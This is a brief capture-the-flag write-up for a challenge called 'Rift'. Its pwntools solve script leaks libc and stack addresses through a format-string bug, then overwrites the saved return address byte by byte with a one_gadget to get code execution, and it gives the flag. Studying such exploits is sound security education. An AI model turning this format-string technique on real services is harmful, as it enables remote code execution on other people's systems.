Skip to main content

Rift

Challenge

Format-string write primitive used to patch saved RIP byte-by-byte to one_gadget.

Solution

Key solve code:

r = remote("localhost", 1337)
r.sendline(b"%p")
libc_leak = int(r.recvline(), 16)
base = libc_leak - 0x1bc8d0
onegadget = base + 0x449d3

r.sendline(b"%8$p")
stack_leak = int(r.recvline(), 16)
rip_addr = stack_leak - 8

for i in range(6):
	r.sendline(f"%{(rip_addr & 0xffff) + i}c%13$hn".encode())
	r.recvline()
	r.sendline(f"%{(onegadget >> (8*i)) & 0xff}c%39$hhn".encode())
	r.recvline()

Flag

gigem{ropping_in_style}

Challenge
Solution
Flag